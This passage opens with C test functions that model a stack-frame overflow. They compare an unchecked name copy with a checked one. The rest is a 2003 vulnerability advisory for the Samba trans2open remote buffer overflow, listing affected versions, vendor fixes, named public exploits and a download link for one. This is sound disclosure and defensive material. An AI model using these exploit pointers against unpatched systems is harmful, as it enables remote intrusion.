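int unchecked_corrupts_return(size_t input_len)
{
    struct frame_model f;
    char *name = make_name(input_len);
    int corrupted;
    if (name == NULL)
        return -1;
    frame_init(&f);
    copy_unchecked(&f, name);
    corrupted = frame_ret_slot(&f) != SENTINEL_RET;
    free(name);
    return corrupted;
}

/* 0 if the checked copy accepts a name of input_len bytes, -1 if it rejects it. */
int checked_accepts(size_t input_len)
{
    struct frame_model f;
    char *name = make_name(input_len);
    int rc;
    if (name == NULL)
        return -1;
    frame_init(&f);
    rc = copy_checked(&f, name);
    free(name);
    return rc;
}
```

A 1023-byte name plus its terminator fills fname exactly; one byte more already reaches the modelled return slot, which is why the destination size has to be the bound.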

- Timeline

2003-04-07 2003-04-03
2003-04-08 Unknown

- Solution

Upgrade to Samba version 2.2.8a, Samba-TNG 0.3.2, or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Vulnerability information

Samba 'call_trans2open' Remote Buffer Overflow Vulnerability
Class: Boundary Condition Error
Bugtraq ID: 7294
Remote: Yes
Local: No
Published: 2003-04-07 12:00:00
Updated: 2009-07-11 09:06:00
Credit: The discoverer of this vulnerability is currently unknown. Digital Defense reported the exploitation of this issue.

- Affected software versions

Sun Solaris 2.5.1_x86
Sun Solaris 2.5.1_ppc
Sun Solaris 2.5.1
Sun Solaris 9_x86 Update 2
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
Sun Linux 5.0
+ Sun LX50
Sun Cobalt RaQ4 3001R
Sun Cobalt RaQ XTR 3500R
Sun Cobalt RaQ 550 4100R
Sun Cobalt Qube3 4000WG
Samba-TNG Samba-TNG 0.3.1
Samba-TNG Samba-TNG 0.3
Samba Samba 2.2.8
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ FreeBSD FreeBSD 5.0
+ FreeBSD FreeBSD 4.8
+ FreeBSD FreeBSD 4.7
+ FreeBSD FreeBSD 4.6
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
Samba Samba 2.2.7a
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ OpenPKG OpenPKG 1.2
+ OpenPKG OpenPKG 1.1
+ RedHat Linux 9.0 i386
+ S.u.S.E. Linux Personal 8.2
+ Slackware Linux 8.1
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Home
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
Samba Samba 2.2.7
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2
+ Sun Linux 5.0.6
+ Sun Solaris 9_x86
+ Sun Solaris 9
Samba Samba 2.2.6
+ Mandriva Linux Mandrake 9.0
Samba Samba 2.2.5
+ Apple Mac OS X 10.2.4
+ Apple Mac OS X 10.2.3
+ Apple Mac OS X 10.2.2
+ Apple Mac OS X 10.2.1
+ Apple Mac OS X 10.2
+ Gentoo Linux 1.4_rc3
+ HP CIFS/9000 Server A.01.09.02
+ HP CIFS/9000 Server A.01.09.01
+ HP CIFS/9000 Server A.01.09
+ HP CIFS/9000 Server A.01.08.01
+ HP CIFS/9000 Server A.01.08
+ HP CIFS/9000 Server A.01.07
+ HP CIFS/9000 Server A.01.06
+ HP CIFS/9000 Server A.01.05
+ OpenPKG OpenPKG 1.1
+ RedHat Linux 8.0 i686
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
+ S.u.S.E. Linux 8.1
Samba Samba 2.2.4
+ Slackware Linux 8.1
Samba Samba 2.2.3a
+ Conectiva Linux 8.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ S.u.S.E. Linux 8.0
Samba Samba 2.2.3a
+ Conectiva Linux 8.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ RedHat Linux 7.3 i686
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
Samba Samba 2.2.2
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ HP CIFS/9000 Server A.01.09
+ HP CIFS/9000 Server A.01.08.01
+ HP CIFS/9000 Server A.01.08
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ OpenPKG OpenPKG 1.0
Samba Samba 2.2.1a
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i586
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 athlon
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ Sun Linux 5.0
+ Sun LX50
Samba Samba 2.2.0a
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
+ Slackware Linux 8.0
Samba Samba 2.2.0
- S.u.S.E. Linux 7.2
Samba Samba 2.0.10
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
+ Veritas Software ServPoint NAS 3.5
+ Veritas Software ServPoint NAS 1.2.2
+ Veritas Software ServPoint NAS 1.2.1
+ Veritas Software ServPoint NAS 1.2
+ Veritas Software ServPoint NAS 1.1
+ Wirex Immunix OS 7+
Samba Samba 2.0.9
- Apple Mac OS X 10.0.4
- Apple Mac OS X Server 10.0
- Caldera OpenLinux Server 3.1
- Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 6.0
- Debian Linux 2.2
- Red Hat Linux 6.2
- RedHat Linux 7.1
- RedHat Linux 7.0
- S.u.S.E. Linux 7.1 sparc
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 6.4 alpha
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3 alpha
- S.u.S.E. Linux 6.3
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Trustix Secure Linux 1.2
- Trustix Secure Linux 1.1
- Wirex Immunix OS 7.0-Beta
- Wirex Immunix OS 7.0
- Wirex Immunix OS 6.2
Samba Samba 2.0.8
- Caldera OpenLinux 2.4
- Conectiva Linux 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0 es
- Conectiva Linux 4.0
- Conectiva Linux graficas
- Conectiva Linux ecommerce
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- Debian Linux 2.2
- RedHat Linux 7.1 i386
- RedHat Linux 7.1 alpha
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- SCO eDesktop 2.4
- SCO eServer 2.3.1
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Wirex Immunix OS 7.0-Beta
- Wirex Immunix OS 7.0
- Wirex Immunix OS 6.2
Samba Samba 2.0.7
+ Caldera OpenLinux 2.3
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
+ Conectiva Linux 4.0 es
+ Conectiva Linux 4.0
+ Conectiva Linux graficas
+ Conectiva Linux ecommerce
+ Debian Linux 2.3 sparc
+ Debian Linux 2.3 powerpc
+ Debian Linux 2.3 alpha
+ Debian Linux 2.3
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.2
+ Mandriva Linux Mandrake 7.1
+ Mandriva Linux Mandrake 7.0
+ Progeny Debian 1.0
+ RedHat Linux 7.1 i686
+ RedHat Linux 7.1 i586
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1
+ RedHat Linux 7.0 i686
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0
+ RedHat Linux 6.2 E sparc
+ RedHat Linux 6.2 E i386
+ RedHat Linux 6.2 E alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ RedHat Linux 6.1 sparc
+ RedHat Linux 6.1 i386
+ RedHat Linux 6.1 alpha
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt RaQ 550 4100R
+ Sun Cobalt RaQ XTR 3500R
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
+ Wirex Immunix OS 7.0-Beta
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 6.2
Samba Samba 2.0.6
+ Red Hat Linux 6.2
+ RedHat Linux 6.2 sparcv9
+ RedHat Linux 6.2 E sparc
+ RedHat Linux 6.2 E i386
+ RedHat Linux 6.2 E alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ Sun Cobalt RaQ4 3001R
Samba Samba 2.0.5
- Caldera OpenLinux 2.3
- SCO eServer 2.3.1
Samba Samba 2.0.4
+ Debian Linux 2.1
+ RedHat Linux 6.0
+ RedHat Linux 5.2 i386
+ RedHat Linux 4.2
Samba Samba 2.0.3
Samba Samba 2.0.2
Samba Samba 2.0.1
Samba Samba 2.0.0
HP HP-UX 11.22
HP HP-UX 11.20
HP HP-UX 11.11
HP HP-UX 11.04
HP HP-UX 11.0
HP HP-UX 10.24
HP HP-UX 10.20
HP HP-UX 10.01
HP CIFS/9000 Server A.01.09.02
HP CIFS/9000 Server A.01.09.01
HP CIFS/9000 Server A.01.09
HP CIFS/9000 Server A.01.08.01
HP CIFS/9000 Server A.01.08
HP CIFS/9000 Server A.01.07
HP CIFS/9000 Server A.01.06
- HP HP-UX 11.11
- HP HP-UX 11.0
HP CIFS/9000 Server A.01.05
Compaq Tru64 5.1b PK1 (BL1)
Compaq Tru64 5.1b
Compaq Tru64 5.1a PK3 (BL3)
Compaq Tru64 5.1a PK2 (BL2)
Compaq Tru64 5.1a PK1 (BL1)
Compaq Tru64 5.1a
Compaq Tru64 5.1 PK6 (BL20)
Compaq Tru64 5.1 PK5 (BL19)
Compaq Tru64 5.1 PK4 (BL18)
Compaq Tru64 5.1 PK3 (BL17)
Compaq Tru64 5.1
Compaq Tru64 5.0f
Compaq Tru64 5.0a PK3 (BL17)
Compaq Tru64 5.0a
Compaq Tru64 5.0 PK4 (BL18)
Compaq Tru64 5.0 PK4 (BL17)
Compaq Tru64 5.0
Compaq Tru64 4.0g PK3 (BL17)
Compaq Tru64 4.0g
Compaq Tru64 4.0f PK7 (BL18)
Compaq Tru64 4.0f PK6 (BL17)
Compaq Tru64 4.0f
Compaq Tru64 4.0d PK9 (BL17)
Compaq Tru64 4.0d
Compaq Tru64 4.0b
Apple Mac OS X 10.2.4
Apple Mac OS X 10.2.3
Apple Mac OS X 10.2.2
Apple Mac OS X 10.2.1
Apple Mac OS X 10.2

- Unaffected software versions

Samba-TNG Samba-TNG 0.3.2
Samba Samba 3.0 alpha
Samba Samba 2.2.8a
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ S.u.S.E. Linux Personal 8.2
HP CIFS/9000 Server A.01.09.04
HP CIFS/9000 Server A.01.09.03
Apple Mac OS X 10.2.5

- Vulnerability discussion

A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.

Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.

It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected.

- Exploit

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

Reports indicate that this vulnerability is being exploited actively in the wild.

An exploit has been made available by H D Moore of Digital Defense and is available from the following location:

http://www.digitaldefense.net/labs/tools/trans2root.pl

A new exploit (sambal.c) has been released by eSDee of Netric Security.

A new exploit (0x82-Remote.54AAb4.xpl.c) has been released by "you dong-hun" (Xpl017Elz), <szoahc@hotmail.com>.

A new exploit (0x333hate.c) has been released by c0wboy <c0wboy@tiscali.it>.

An exploit (samba_trans2open.pm) has been released as part of the MetaSploit Framework 2.0.

An exploit for Mac OS X has been released as part of the MetaSploit Framework 2.3.

- Solution

This vulnerability has been addressed in Samba-TNG 0.3.2.

Samba 2.2.8a has been released, which addresses this issue. Samba is currently developing patches which will specifically address this issue in versions 2.2.7a and 2.0.10. Users are advised to upgrade as soon as possible.

Sun has released an alert(ID: 53581) notification and a patch to address this issue.

This issue is addressed in MacOS X 10.2.5. An update can be applied via the Software Update pane in System Preferences. Releases prior to 10.2.5 shipped with a vulnerable version of Samba.

SGI has released a security advisory (20030403-01-P) containing fixes which address this issue.

Slackware has released a security advisory (2003-04-08) containing fixes which address this issue.

Debian has released a security advisory (DSA 280-1) containing fixes which address this issue.

OpenPKG has released a security advisory (OpenPKG-SA-2003.028) containing fixes which address this issue.

Mandrake has released a security advisory (MDKSA-2003:044) containing fixes which address this issue.

FreeBSD has released a security note (FreeBSD-SN-03:01) which contains updated ports information. Further information can be found in the attached advisory.

Immunix has released a security advisory (IMNX-2003-7+-006-01) which contains fixes which address this issue for Samba 2.0.10. Users are advised to upgrade as soon as possible.

SuSE has released a security advisory (SuSE-SA:2003:025) containing fixes which address this issue. Further information regarding how to obtain and apply fixes can be found in the attached advisory.

Trustix has released a security advisory (TSLSA-2003-0019) containing fixes to address this issue.

Sorcerer has released an advisory containing fix information. Further details can be found in the attached message reference.

Conectiva has released an advisory (CLA-2003:624) containing fixes which address this issue. Users are advised to upgrade as soon as possible.

Red Hat has revised its advisory (RHSA-2003:137-02). See referenced advisory for new fix details.

Gentoo Linux has released an advisory. Users who have installed net-fs/samba are advised to upgrade to samba-2.2.8a by issuing the following commands:

emerge sync
emerge samba
emerge clean

HP has revised its advisory HPSBUX004-254. HP has stated that CIFS Server 2.2e version A.01.09.04 is not vulnerable to this issue. Affected users are advised to download and install the new version from http://software.hp.com. Further information is available in the referenced advisory.

Veritas has determined that various ServPoint NAS releases are affected by this vulnerability. Patches are currently being developed. Users are advised to contact the vendor for further information regarding how to obtain fixes.

SCO has released a revised version of security advisory CSSA-2003-SCO.13 for OpenServer to address this issue. Details on obtaining updates are available in the referenced advisory.

